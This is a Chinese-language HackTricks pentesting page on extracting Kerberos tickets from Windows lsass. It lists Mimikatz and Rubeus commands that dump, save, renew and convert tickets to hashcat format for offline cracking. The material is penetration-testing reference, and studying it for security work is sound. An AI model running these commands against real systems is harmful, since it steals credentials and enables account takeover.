hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md

从Windows中提取票证

{% hint style="success" %} 学习与实践AWS黑客技术：HackTricks培训AWS红队专家（ARTE）
学习与实践GCP黑客技术：HackTricks培训GCP红队专家（GRTE）

支持HackTricks

• 查看订阅计划!
• 加入 💬 Discord群组或Telegram群组或关注我们的Twitter 🐦 @hacktricks_live.
• 通过向 HackTricks和HackTricks Cloud GitHub库提交PR分享黑客技巧。

{% endhint %}

Windows中的票证由lsass（本地安全授权子系统服务）进程管理和存储，该进程负责处理安全策略。要提取这些票证，必须与lsass进程进行交互。非管理员用户只能访问自己的票证，而管理员则有权提取系统上的所有票证。对于此类操作，工具Mimikatz和Rubeus被广泛使用，每种工具提供不同的命令和功能。

Mimikatz

Mimikatz是一个多功能工具，可以与Windows安全进行交互。它不仅用于提取票证，还用于各种其他与安全相关的操作。

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus 是一个专门为 Kerberos 交互和操作量身定制的工具。它用于票证提取和处理，以及其他与 Kerberos 相关的活动。

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

在使用这些命令时，请确保将占位符如 <BASE64_TICKET> 和 <luid> 替换为实际的 Base64 编码票证和登录 ID。这些工具提供了广泛的功能，用于管理票证和与 Windows 的安全机制进行交互。

参考文献

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

{% hint style="success" %} 学习与实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE)
学习与实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

• 查看 订阅计划!
• 加入 💬 Discord 群组 或 Telegram 群组 或 关注 我们的 Twitter 🐦 @hacktricks_live.
• 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

{% endhint %}